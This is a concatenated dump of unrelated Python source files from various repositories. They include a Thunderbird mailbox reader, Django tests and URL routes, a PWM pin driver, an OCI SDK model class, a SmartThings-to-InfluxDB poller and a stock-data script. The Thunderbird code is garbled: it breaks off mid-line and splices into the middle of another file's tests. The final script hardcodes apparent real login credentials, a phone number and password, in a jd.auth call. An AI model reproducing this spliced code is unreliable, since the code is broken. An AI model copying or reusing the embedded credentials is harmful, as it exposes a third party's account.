email.header import decode_header, make_header\nfrom mimetypes import guess_extension\nfrom ftfy import fix_text\nimport re\nimport os\nimport sys\nimport urllib\nimport yaml\nfrom thunderbird.profiler import Profiler\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\n\nclass Thunderbird(object):\n '''\n Thunderbird Mailbox access\n '''\n profiles={}\n \n def __init__(self,user,db=None,profile=None):\n '''\n construct a Thunderbird access instance for the given user\n '''\n self.user=user\n if db is None and profile is None:\n profileMap=Thunderbird.getProfileMap()\n if user in profileMap:\n profile=profileMap[user]\n else:\n raise Exception(\"user %s missing in .thunderbird.yaml\" % user)\n self.db=profile['db']\n self.profile=profile['profile']\n else:\n self.db=db\n self.profile=profile\n try:\n self.sqlDB=SQLDB(self.db,check_same_thread=False,timeout=5)\n except sqlite3.OperationalError as soe:\n print(f\"could not open database {self.db}: {soe}\")\n raise soe\n pass\n \n @staticmethod\n def getProfileMap():\n '''\n get the profile map from a thunderbird.yaml file\n '''\n home = str(Path.home())\n profilesPath=home+\"/.thunderbird.yaml\"\n with open(profilesPath, 'r') as stream:\n profileMap = yaml.safe_load(stream)\n return profileMap\n \n @staticmethod\n def get(user):\n if not user in Thunderbird.profiles:\n tb=Thunderbird(user)\n Thunderbird.profiles[user]=tb\n return Thunderbird.profiles[user] \n\nclass Mail(object):\n '''\n classdocs\n '''\n\n def __init__(self, user,mailid,tb=None,debug=False,keySearch=True):\n '''\n Constructor\n \n Args:\n user(string): userid of the user \n mailid(string): unique id of the mail\n debug(bool): True if debugging should be activated\n keySearch(bool): True if a slow keySearch should be tried when lookup fails\n '''\n self.debug=debug\n self.user=user\n if tb is None:\n self.tb=Thunderbird.get(user)\n else:\n self.tb=tb\n if self.debug:\n print(f\"Searching for mail with id {mailid} for user {user}\")\n mailid=re.sub(r\"\\<(.*)\\>\",r\"\\1\",mailid)\n self.mailid=mailid\n self.keySearch=keySearch\n self.rawMsg=None\n self.headers={}\n self.fromUrl=None\n self.fromMailTo=None\n self.toUrl=None\n self.toMailTo=None\n query=\"\"\"select m.*,f.* \nfrom messages m join\nfolderLocations f on m.folderId=f.id\nwhere m.headerMessageID==(?)\"\"\"\n params=(mailid,)\n maillookup=self.tb.sqlDB.query(query,params)\n #folderId=maillookup['folderId']\n if self.debug:\n print (maillookup)\n if len(maillookup)==0:\n self.found=False\n else:\n self.found=True\n mailInfo=maillookup[0]\n folderURI=mailInfo['folderURI']\n messageKey=int(mailInfo['messageKey'])\n folderURI=urllib.parse.unquote(folderURI)\n sbdFolder,self.folder=Mail.toSbdFolder(folderURI)\n folderPath=self.tb.profile+sbdFolder\n if os.path.isfile(folderPath):\n if self.debug:\n print (folderPath)\n self.mbox=mailbox.mbox(folderPath)\n getTime=Profiler(f\"mbox.get {messageKey-1}\",profile=self.debug)\n self.msg=self.mbox.get(messageKey-1)\n getTime.time()\n # if lookup fails we might loop thru\n # all messages if this option is active ...\n if self.msg is None and self.keySearch:\n searchId=\"<%s>\" % mailid\n searchTime=Profiler(f\"keySearch {searchId} after mbox.get failed\",profile=self.debug)\n for key in self.mbox.keys():\n keyMsg=self.mbox.get(key)\n msgId=keyMsg.get(\"Message-Id\")\n if msgId==searchId:\n self.msg=keyMsg\n break\n pass\n searchTime.time()\n self.mbox.close()\n if self.msg is not None:\n for key in self.msg.keys():\n #https://stackoverflow.com/a/21715870/1497139\n self.headers[key]=str(make_header(decode_header(self.msg.get(key))))\n self.txtMsg=\"\"\n self.html=\"\"\n # https://stackoverflow.com/a/43833186/1497139\n self.msgParts=[]\n # decode parts\n # https://stackoverflow.com/questions/59554237/how-to-handle-all-charset-and-content-type-when-reading-email-from-imap-lib-in-p\n # https://gist.github.com/miohtama/5389146\n for part in self.msg.walk():\n self.msgParts.append(part)\n part.length=len(part._payload)\n # each part is a either non-multipart, or another multipart message\n # that contains further parts... Message is organized like a tree\n contentType=part.get_content_type()\n charset = part.get_content_charset()\n if charset is None:\n charset='utf-8'\n partname=part.get_param('name')\n part.filename=self.fixedPartName(partname,contentType,len(self.msgParts))\n if contentType == 'text/plain' or contentType== 'text/html':\n part_str = part.get_payload(decode=1)\n rawPart=part_str.decode(charset)\n if contentType == 'text/plain':\n self.txtMsg+=rawPart\n elif contentType == 'text/html':\n self.html+=rawPart\n pass\n # sort the headers\n self.headers=OrderedDict(sorted(self.headers.items()))\n if \"From\" in self.headers:\n fromAdr=self.headers[\"From\"]\n self.fromMailTo=f\"mailto:{fromAdr}\"\n self.fromUrl=f\"{fromAdr}\"\n if \"To\" in self.headers:\n toAdr=self.headers[\"To\"]\n self.toMailTo=f\"mailto:{toAdr}\"\n self.toUrl=f\"{toAdr}\"\n pass\n \n def fixedPartName(self,partname:str,contentType:str,partIndex:int):\n '''\n get a fixed version of the partname\n \n \n Args:\n partname(str): the name of the part\n defaultName(str): the default name to use\n '''\n \n # avoid TypeError: expected string or bytes-like object\n if partname:\n if type(partname) is tuple:\n _encoding,_unknown,partname=partname\n filename=str(make_header(decode_header(partname)))\n else:\n ext=guess_extension(contentType.partition(';')[0].strip())\n if ext is None:\n ext=\".txt\"\n filename=f\"part{partIndex}{ext}\"\n filename=fix_text(filename)\n return filename\n \n def __str__(self):\n text=f\"{self.user}/{self.mailid}\"\n return text\n \n def getHeader(self,headerName:str):\n '''\n get the header with the given name\n \n Args: \n headerName(str): the name of the header\n \n Returns:\n str: the header value\n '''\n if headerName in self.headers:\n headerValue=self.headers[headerName]\n else:\n headerValue=\"?\"\n return headerValue\n \n def asWikiMarkup(self)->str:\n '''\n convert me to wiki markup in Wikison notation\n \n Returns:\n str: a http://wiki.bitplan.com/index.php/WikiSon notation\n '''\n wikison=f\"\"\"{{{{mail\n|user={self.user}\n|id={self.mailid}\n|from={self.getHeader('From')}\n|to={self.getHeader('To')}\n|subject={self.getHeader('Subject')}\n}}}}\"\"\"\n return wikison\n \n \n def partAsFile(self,folder,partIndex):\n '''\n save the given part to a file and return the filename\n '''\n # TODO: check Index \n part=self.msgParts[partIndex]\n f = open(f\"{folder}/{part.filename}\", 'wb')\n f.write(part.get_payload(decode=1))\n f.close()\n return part.filename\n \n \n @staticmethod\n def toSbdFolder(folderURI):\n '''\n get the SBD folder for the given folderURI as a tuple\n \n Args:\n folderURI(str): the folder uri\n Returns:\n sbdFolder(str): the prefix\n folder(str): the local path\n '''\n folder=folderURI.replace('mailbox://nobody@','')\n # https://stackoverflow.com/a/14007559/1497139\n parts=folder.split(\"/\")\n sbdFolder=\"/Mail/\"\n folder=\"\"\n for i,part in enumerate(parts):\n if i==0: # e.g. \"Local Folders\" ... \n sbdFolder+=f\"{part}/\" \n elif i1812')\n self.assertTrue(ancestor.year_of_birth.is_after)\n\n def test_get_age(self):\n ancestors = [\n AncestorFactory(year_of_birth='<1840', year_of_death=None, has_expired=True),\n AncestorFactory(year_of_birth='1812', year_of_death=1870),\n AncestorFactory(year_of_birth='<1840', year_of_death=None)\n ]\n result = [ancestor.get_age() for ancestor in ancestors]\n expected = ['<1840 - ????', '1812 - 1870', '<1840 -']\n self.assertEqual(result, expected)\n\n def test_order_by_age(self):\n ancestors = [\n AncestorFactory(year_of_birth='<1840', year_of_death=None, has_expired=True),\n AncestorFactory(year_of_birth='1812', year_of_death=1870),\n AncestorFactory(year_of_birth='<1840', year_of_death=None)\n ]\n result = list(Ancestor.objects.order_by_age())\n expected = [ancestors[1], ancestors[2], ancestors[0]]\n self.assertEqual(result, expected)\n\n\nclass TestFileReference(TestCase):\n\n def test_save(self):\n img = Image.new('RGB', (1, 1))\n fh = BytesIO()\n img.save(fh, 'JPEG')\n\n ancestor = AncestorFactory(year_of_birth='<1812')\n reference = FileReference(description='Foo', ancestor=ancestor)\n reference.file.save('foo.jpg', fh)\n\n self.assertEqual(reference.mimetype, 'image/jpeg')\n","repo_name":"bboogaard/family","sub_path":"tests/tree/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33340891647","text":"import asyncio\nimport aiofiles\nimport os.path\n\nclass PwmPin():\n def __init__(self, channel, period=1000000, root=\"/sys/class/pwm/pwmchip0\"):\n \"\"\"\n \"\"\"\n self.path = os.path.join(root, \"pwm{}\".format(channel))\n if not os.path.exists(self.path):\n self._export_pwm(root, channel)\n\n self._initialize_pwm(period)\n\n def _export_pwm(self, root, pin):\n with open(os.path.join(root, \"export\"), 'w') as export:\n export.write(\"{}\\n\".format(pin))\n if not os.path.exists(self.path):\n raise RuntimeError(\"PWM Channel not available, is 'pwm-2chan' added to /boot/config.txt\")\n\n def _initialize_pwm(self, period):\n self.period = period / 1.0e9\n with open(os.path.join(self.path, \"period\"), 'w') as period_file:\n period_file.write(str(period))\n # Note: The period must be valid before a channel can be enabled.\n with open(os.path.join(self.path, \"enable\"), 'w') as enable:\n enable.write(\"1\")\n\n def id(self):\n return self.path\n\n async def set_duty_cycle(self, duty_cycle):\n duty = int(duty_cycle * self.period * 1e9)\n async with aiofiles.open(os.path.join(self.path, \"duty_cycle\"), 'w') as dc_file:\n await dc_file.write(str(duty))\n\n async def get_duty_cycle(self):\n async with aiofiles.open(os.path.join(self.path, \"duty_cycle\"), 'r') as dc_file:\n duty_cycle = await dc_file.read()\n return float(duty_cycle) / (self.period * 1e9)\n","repo_name":"mds5000/aquarium-server","sub_path":"backend/device/pwm.py","file_name":"pwm.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5133742639","text":"# *******************************************************************************************\n# *******************************************************************************************\n#\n#\t\tName : \t\tfscript.py\n#\t\tPurpose :\tFloating Point Script Compiler. Like a simple RPN calculator.\n#\t\tDate :\t\t15th August 2019\n#\t\tAuthor : \tPaul Robson (paul@robsons.org.uk)\n#\n# *******************************************************************************************\n# *******************************************************************************************\n\nimport sys\n\nclass FScriptCompiler(object):\n\tdef __init__(self,handle = sys.stdout):\n\t\tself.tgt = handle\n\t#\n\tdef integer(self,n):\n\t\tn1 = int(n) & 0xFFFFFFFF \t\t\t\t\t\t\t\t\t\t# convert to 32 bit.\n\t\tself.tgt.write(\"\\t.byte \t1\t; *** Load Integer {0} ***\\n\".format(n))\n\t\tself.tgt.write(\"\\t.dword \t${0:x}\\n\".format(n1))\n\t\tself.tgt.write(\"\\t.byte \t0,$01\\n\")\n\t#\n\tdef float(self,f):\n\t\tszByte = 0 \t\t\t\t\t\t\t\t\t\t\t\t\t\t# defaults\n\t\tmantissa = 0\n\t\texponent = 0x80\n\t\tfOrg = f\n\t\tif f == 0.0:\t\t\t\t\t\t\t\t\t\t\t\t\t# convert to float format.\n\t\t\tszByte = 0x40\t\t\t\t\t\t\t\t\t\t\t\t# zero\n\t\telse:\n\t\t\tszByte = 0x00 \t\t\t\t\t\t\t\t\t\t\t\t# non-zero\n\t\t\tif f < 0:\n\t\t\t\tf = abs(f)\n\t\t\t\tszByte = 0x80\n\t\t\twhile f < 0.5 or f >= 1.0:\n\t\t\t\tif f < 0.5:\n\t\t\t\t\tf = f * 2.0\n\t\t\t\t\texponent -= 1\n\t\t\t\telse:\n\t\t\t\t\tf = f / 2.0\n\t\t\t\t\texponent += 1\n\t\t\tmantissa = int(f * 0x100000000)\n\t\t\t#print(fOrg,pow(2.0,exponent-128)*mantissa/0x100000000)\n\n\t\tself.tgt.write(\"\\t.byte \t1 ; *** Load Float {0} ***\\n\".format(fOrg))\n\t\tself.tgt.write(\"\\t.dword \t${0:x}\\n\".format(mantissa))\n\t\tself.tgt.write(\"\\t.byte \t${0:02x},${1:x}\\n\".format(exponent,szByte))\n\t#\n\tdef command(self,c):\n\t\tself.tgt.write(\"\\t.byte \t${0:02x} ; *** Command {1} ***\\n\".format(ord(c),c))\n\t#\n\tdef end(self):\n\t\tself.tgt.write(\"\\t.byte \t0\\n\")\n\nif __name__ == \"__main__\":\n\tfc = FScriptCompiler()\n\tfc.float(99.94)\n\tfc.integer(42)\n\tfc.end()\n","repo_name":"paulscottrobson/mega-basic","sub_path":"source/scripts/fscript.py","file_name":"fscript.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"31599086879","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass UpdateChannelDetails(object):\n \"\"\"\n Properties to update a Channel.\n \"\"\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"ANDROID\"\n TYPE_ANDROID = \"ANDROID\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"APPEVENT\"\n TYPE_APPEVENT = \"APPEVENT\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"APPLICATION\"\n TYPE_APPLICATION = \"APPLICATION\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"CORTANA\"\n TYPE_CORTANA = \"CORTANA\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"FACEBOOK\"\n TYPE_FACEBOOK = \"FACEBOOK\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"IOS\"\n TYPE_IOS = \"IOS\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"MSTEAMS\"\n TYPE_MSTEAMS = \"MSTEAMS\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"OSS\"\n TYPE_OSS = \"OSS\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"OSVC\"\n TYPE_OSVC = \"OSVC\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"SERVICECLOUD\"\n TYPE_SERVICECLOUD = \"SERVICECLOUD\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"SLACK\"\n TYPE_SLACK = \"SLACK\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"TEST\"\n TYPE_TEST = \"TEST\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"TWILIO\"\n TYPE_TWILIO = \"TWILIO\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"WEB\"\n TYPE_WEB = \"WEB\"\n\n #: A constant which can be used with the type property of a UpdateChannelDetails.\n #: This constant has a value of \"WEBHOOK\"\n TYPE_WEBHOOK = \"WEBHOOK\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new UpdateChannelDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.oda.models.UpdateOsvcChannelDetails`\n * :class:`~oci.oda.models.UpdateOSSChannelDetails`\n * :class:`~oci.oda.models.UpdateAndroidChannelDetails`\n * :class:`~oci.oda.models.UpdateMSTeamsChannelDetails`\n * :class:`~oci.oda.models.UpdateAppEventChannelDetails`\n * :class:`~oci.oda.models.UpdateWebChannelDetails`\n * :class:`~oci.oda.models.UpdateIosChannelDetails`\n * :class:`~oci.oda.models.UpdateSlackChannelDetails`\n * :class:`~oci.oda.models.UpdateServiceCloudChannelDetails`\n * :class:`~oci.oda.models.UpdateTwilioChannelDetails`\n * :class:`~oci.oda.models.UpdateWebhookChannelDetails`\n * :class:`~oci.oda.models.UpdateApplicationChannelDetails`\n * :class:`~oci.oda.models.UpdateFacebookChannelDetails`\n * :class:`~oci.oda.models.UpdateCortanaChannelDetails`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param name:\n The value to assign to the name property of this UpdateChannelDetails.\n :type name: str\n\n :param description:\n The value to assign to the description property of this UpdateChannelDetails.\n :type description: str\n\n :param type:\n The value to assign to the type property of this UpdateChannelDetails.\n Allowed values for this property are: \"ANDROID\", \"APPEVENT\", \"APPLICATION\", \"CORTANA\", \"FACEBOOK\", \"IOS\", \"MSTEAMS\", \"OSS\", \"OSVC\", \"SERVICECLOUD\", \"SLACK\", \"TEST\", \"TWILIO\", \"WEB\", \"WEBHOOK\"\n :type type: str\n\n :param session_expiry_duration_in_milliseconds:\n The value to assign to the session_expiry_duration_in_milliseconds property of this UpdateChannelDetails.\n :type session_expiry_duration_in_milliseconds: int\n\n :param freeform_tags:\n The value to assign to the freeform_tags property of this UpdateChannelDetails.\n :type freeform_tags: dict(str, str)\n\n :param defined_tags:\n The value to assign to the defined_tags property of this UpdateChannelDetails.\n :type defined_tags: dict(str, dict(str, object))\n\n \"\"\"\n self.swagger_types = {\n 'name': 'str',\n 'description': 'str',\n 'type': 'str',\n 'session_expiry_duration_in_milliseconds': 'int',\n 'freeform_tags': 'dict(str, str)',\n 'defined_tags': 'dict(str, dict(str, object))'\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'description': 'description',\n 'type': 'type',\n 'session_expiry_duration_in_milliseconds': 'sessionExpiryDurationInMilliseconds',\n 'freeform_tags': 'freeformTags',\n 'defined_tags': 'definedTags'\n }\n\n self._name = None\n self._description = None\n self._type = None\n self._session_expiry_duration_in_milliseconds = None\n self._freeform_tags = None\n self._defined_tags = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['type']\n\n if type == 'OSVC':\n return 'UpdateOsvcChannelDetails'\n\n if type == 'OSS':\n return 'UpdateOSSChannelDetails'\n\n if type == 'ANDROID':\n return 'UpdateAndroidChannelDetails'\n\n if type == 'MSTEAMS':\n return 'UpdateMSTeamsChannelDetails'\n\n if type == 'APPEVENT':\n return 'UpdateAppEventChannelDetails'\n\n if type == 'WEB':\n return 'UpdateWebChannelDetails'\n\n if type == 'IOS':\n return 'UpdateIosChannelDetails'\n\n if type == 'SLACK':\n return 'UpdateSlackChannelDetails'\n\n if type == 'SERVICECLOUD':\n return 'UpdateServiceCloudChannelDetails'\n\n if type == 'TWILIO':\n return 'UpdateTwilioChannelDetails'\n\n if type == 'WEBHOOK':\n return 'UpdateWebhookChannelDetails'\n\n if type == 'APPLICATION':\n return 'UpdateApplicationChannelDetails'\n\n if type == 'FACEBOOK':\n return 'UpdateFacebookChannelDetails'\n\n if type == 'CORTANA':\n return 'UpdateCortanaChannelDetails'\n else:\n return 'UpdateChannelDetails'\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this UpdateChannelDetails.\n The Channel's name. The name can contain only letters, numbers, periods, and underscores. The name must begin with a letter.\n\n\n :return: The name of this UpdateChannelDetails.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this UpdateChannelDetails.\n The Channel's name. The name can contain only letters, numbers, periods, and underscores. The name must begin with a letter.\n\n\n :param name: The name of this UpdateChannelDetails.\n :type: str\n \"\"\"\n self._name = name\n\n @property\n def description(self):\n \"\"\"\n Gets the description of this UpdateChannelDetails.\n A short description of the Channel.\n\n\n :return: The description of this UpdateChannelDetails.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"\n Sets the description of this UpdateChannelDetails.\n A short description of the Channel.\n\n\n :param description: The description of this UpdateChannelDetails.\n :type: str\n \"\"\"\n self._description = description\n\n @property\n def type(self):\n \"\"\"\n **[Required]** Gets the type of this UpdateChannelDetails.\n The Channel type.\n\n Allowed values for this property are: \"ANDROID\", \"APPEVENT\", \"APPLICATION\", \"CORTANA\", \"FACEBOOK\", \"IOS\", \"MSTEAMS\", \"OSS\", \"OSVC\", \"SERVICECLOUD\", \"SLACK\", \"TEST\", \"TWILIO\", \"WEB\", \"WEBHOOK\"\n\n\n :return: The type of this UpdateChannelDetails.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type):\n \"\"\"\n Sets the type of this UpdateChannelDetails.\n The Channel type.\n\n\n :param type: The type of this UpdateChannelDetails.\n :type: str\n \"\"\"\n allowed_values = [\"ANDROID\", \"APPEVENT\", \"APPLICATION\", \"CORTANA\", \"FACEBOOK\", \"IOS\", \"MSTEAMS\", \"OSS\", \"OSVC\", \"SERVICECLOUD\", \"SLACK\", \"TEST\", \"TWILIO\", \"WEB\", \"WEBHOOK\"]\n if not value_allowed_none_or_none_sentinel(type, allowed_values):\n raise ValueError(\n f\"Invalid value for `type`, must be None or one of {allowed_values}\"\n )\n self._type = type\n\n @property\n def session_expiry_duration_in_milliseconds(self):\n \"\"\"\n Gets the session_expiry_duration_in_milliseconds of this UpdateChannelDetails.\n The number of milliseconds before a session expires.\n\n\n :return: The session_expiry_duration_in_milliseconds of this UpdateChannelDetails.\n :rtype: int\n \"\"\"\n return self._session_expiry_duration_in_milliseconds\n\n @session_expiry_duration_in_milliseconds.setter\n def session_expiry_duration_in_milliseconds(self, session_expiry_duration_in_milliseconds):\n \"\"\"\n Sets the session_expiry_duration_in_milliseconds of this UpdateChannelDetails.\n The number of milliseconds before a session expires.\n\n\n :param session_expiry_duration_in_milliseconds: The session_expiry_duration_in_milliseconds of this UpdateChannelDetails.\n :type: int\n \"\"\"\n self._session_expiry_duration_in_milliseconds = session_expiry_duration_in_milliseconds\n\n @property\n def freeform_tags(self):\n \"\"\"\n Gets the freeform_tags of this UpdateChannelDetails.\n Simple key-value pair that is applied without any predefined name, type, or scope.\n Example: `{\\\"bar-key\\\": \\\"value\\\"}`\n\n\n :return: The freeform_tags of this UpdateChannelDetails.\n :rtype: dict(str, str)\n \"\"\"\n return self._freeform_tags\n\n @freeform_tags.setter\n def freeform_tags(self, freeform_tags):\n \"\"\"\n Sets the freeform_tags of this UpdateChannelDetails.\n Simple key-value pair that is applied without any predefined name, type, or scope.\n Example: `{\\\"bar-key\\\": \\\"value\\\"}`\n\n\n :param freeform_tags: The freeform_tags of this UpdateChannelDetails.\n :type: dict(str, str)\n \"\"\"\n self._freeform_tags = freeform_tags\n\n @property\n def defined_tags(self):\n \"\"\"\n Gets the defined_tags of this UpdateChannelDetails.\n Usage of predefined tag keys. These predefined keys are scoped to namespaces.\n Example: `{\\\"foo-namespace\\\": {\\\"bar-key\\\": \\\"value\\\"}}`\n\n\n :return: The defined_tags of this UpdateChannelDetails.\n :rtype: dict(str, dict(str, object))\n \"\"\"\n return self._defined_tags\n\n @defined_tags.setter\n def defined_tags(self, defined_tags):\n \"\"\"\n Sets the defined_tags of this UpdateChannelDetails.\n Usage of predefined tag keys. These predefined keys are scoped to namespaces.\n Example: `{\\\"foo-namespace\\\": {\\\"bar-key\\\": \\\"value\\\"}}`\n\n\n :param defined_tags: The defined_tags of this UpdateChannelDetails.\n :type: dict(str, dict(str, object))\n \"\"\"\n self._defined_tags = defined_tags\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/oda/models/update_channel_details.py","file_name":"update_channel_details.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"11675338435","text":"import cv2\nimport numpy as np\nfrom detection2.Obraz import image_operations as imOp\n\n\nclass Image:\n def __init__(self, path):\n self.img = prepareImg(cv2.imread(path))\n self.Q = genQMatrix(self.img)\n self.P = genPVector(self.img)\n pass\n\n #first second are 2 elements tuples\n def cr(self, first, second):\n n = size(first, second)\n QSum = self.Q[second[0], second[1]] + self.Q[first[0], first[1]] - self.Q[first[0], second[1]] - self.Q[second[0], first[1]]\n PSum = self.P[second[0], second[1]] + self.P[first[0], first[1]] - self.P[first[0], second[1]] - self.P[second[0], first[1]]\n PSum = PSum.reshape(9 , 1)@PSum.reshape(1 , 9)\n if(n == 0 ):\n print(f'FIRST: {first[0]}, {first[1]}; SECOND: {second[0]}, {second[1]}')\n return (QSum - PSum/n)/(n)\n\n\n def getX(self):\n return self.img.shape[1]-1\n\n\n def getY(self):\n return self.img.shape[0]-1\n\n\ndef size(first, second):\n return abs((second[0]-first[0])+1)*(abs(second[1]-first[1])+1)\n\n\ndef genQMatrix(img):\n Q = np.zeros((img.shape[0], img.shape[1], 9, 9))\n for y in range(img.shape[0]):\n for x in range(img.shape[1]):\n Q[y, x] = img[y,x].reshape(9,1)@img[y, x].reshape(1,9)\n Q = np.cumsum(Q, axis = 0)\n Q = np.cumsum(Q, axis = 1)\n return Q\n\n\ndef genPVector(img):\n S = img\n S = np.cumsum(S, axis=0)\n S = np.cumsum(S, axis=1)\n return S\n\n\ndef prepareImg(img):\n imgShape2 = (img.shape[0], img.shape[1])\n X = np.fromfunction(lambda i, j: j, shape=imgShape2)\n Y = np.fromfunction(lambda i, j: i, shape=imgShape2)\n gray = imOp.grayscale(img)\n eX = imOp.edgeX(gray)\n eXX = imOp.edgeX(eX)\n eY = imOp.edgeY(gray)\n eYY = imOp.edgeY(eY)\n merged = np.zeros((imgShape2[0], imgShape2[1], 9))\n for y in range(imgShape2[0]):\n for x in range(imgShape2[1]):\n merged[y, x] = [X[y,x], Y[y,x], img[y,x,0], img[y,x,1], img[y,x,2], eX[y,x], eXX[y,x], eY[y,x], eYY[y,x]]\n return merged\n\n","repo_name":"terechsan/detection2","sub_path":"Obraz/Image.py","file_name":"Image.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17123403326","text":"import json\nfrom time import (sleep, time)\nfrom datetime import datetime\nfrom os import environ\nfrom smartthings import SmartThings\nfrom influxdb import InfluxDBClient\nfrom sys import stderr\n\nclass ReSTHome(SmartThings):\n\n def __init__(self):\n\n self.influxhost = environ.get('INFLUX_NODENAME', 'localhost')\n self.influxdb = environ.get('INFLUX_DB', 'resthomedb')\n self.influxport = environ.get('INFLUX_PORT', 8086)\n self.influxuser = environ.get('INFLUX_USERNAME', 'root')\n self.influxpass = environ.get('INFLUX_PASSWORD', 'root')\n self.poll_interval = environ.get('IOTDB_POLL_INTERVAL', 900)\n self.device_exclusion = environ.get('IOTDB_DEVICE_EXCLUSION', \n '').split(',')\n self.retry_intervals = environ.get('IOTDB_RETRY_INTERVAL', 60)\n self.verbose = False\n\n# main\nrh = ReSTHome()\n\ntry:\n rh.load_settings()\nexcept IOError as e:\n stderr.write(\"Error accessing smarthings.json (%s)\\n\" % str(e))\nexcept (AttributeError, ValueError) as e:\n stderr.write(\"Error parsing JSON (%s)\\n\" % str(e))\nexcept:\n stderr.write(\"Unknown error parsing smarthings.json\\n\")\n raise\n\nwhile True:\n\n timer = time()\n \n try:\n rh.request_endpoints()\n except:\n stderr.write(\"Unable to connect or parse endpoints, will retry in %ss\\n\" % \n rh.retry_intervals)\n sleep(rh.retry_intervals)\n continue \n \n try:\n client = InfluxDBClient(rh.influxhost, rh.influxport, rh.influxuser,\n rh.influxpass, rh.influxdb)\n except:\n stderr.write(\"Unable to connect to InfluxDB\\n\")\n continue\n\n payload = [] \n\n for sensor in rh.device_types():\n if not sensor in rh.device_exclusion:\n try:\n ds = rh.request_devices(sensor)\n except:\n stderr.write(\"Unable to connect/retreive your %s device(s)\\n\" %\n sensor)\n continue\n\n if(ds):\n for dev in ds:\n item = {}\n key = \"%s.%s.%s\" % (dev['hub'], dev['label'], sensor)\n key = key.lower()\n key = key.replace(' ', '_')\n\n item['measurement'] = key\n item['tags'] = { 'label': dev['label'] }\n item['tags']['type'] = dev['type']\n item['tags']['hub'] = dev['hub']\n item['time'] = \"%sZ\" % datetime.isoformat(datetime.utcnow())\n item['fields'] = { 'value': dev['value'][sensor] }\n\n payload.append(item)\n\n try:\n client.write_points(payload)\n except:\n stderr.write(\"Unable to write data series to InfluxDB\\n\")\n pass\n\n timer = time() - timer\n\n if timer < rh.poll_interval:\n sleep(rh.poll_interval - timer)\n","repo_name":"datamattsson/resthome","sub_path":"app/resthome.py","file_name":"resthome.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"38157239811","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home), #Directorio raiz\n path('gestionarEstudiantes/', views.gestionarEstudiantes),\n path('gestionarCursos/', views.gestionarCursos),\n path('registrarCurso/', views.registrarCurso),\n path('registrarEstudiante/', views.registrarEstudiante),\n path('edicionCurso/', views.edicionCurso),\n path('edicionEstudiante/', views.edicionEstudiante),\n path('editarCurso/', views.editarCurso),\n path('editarEstudiante/', views.editarEstudiante),\n path('eliminarCurso/', views.eliminarCurso),\n path('eliminarEstudiante/', views.eliminarEstudiante)\n]\n","repo_name":"MeybelGuardado/PracticaDjango","sub_path":"Universidad/Aplicaciones/Academico/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22712572434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 5 20:05:55 2020\n\n@author: 17854\n\"\"\"\n\nimport jqdatasdk as jd\njd.auth('17854120489','shafajueduan28')\ncount=jd.get_query_count()\nprint(count)\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n'''\n申万指数在2014-02-21有一次大改,删除了6个一级行业,并增加了11个一级行业。故:\ndate < 2014-02-21 申万一级行业有23个\ndate = 2014-02-21 申万一级行业有34个\ndate > 2014-02-21 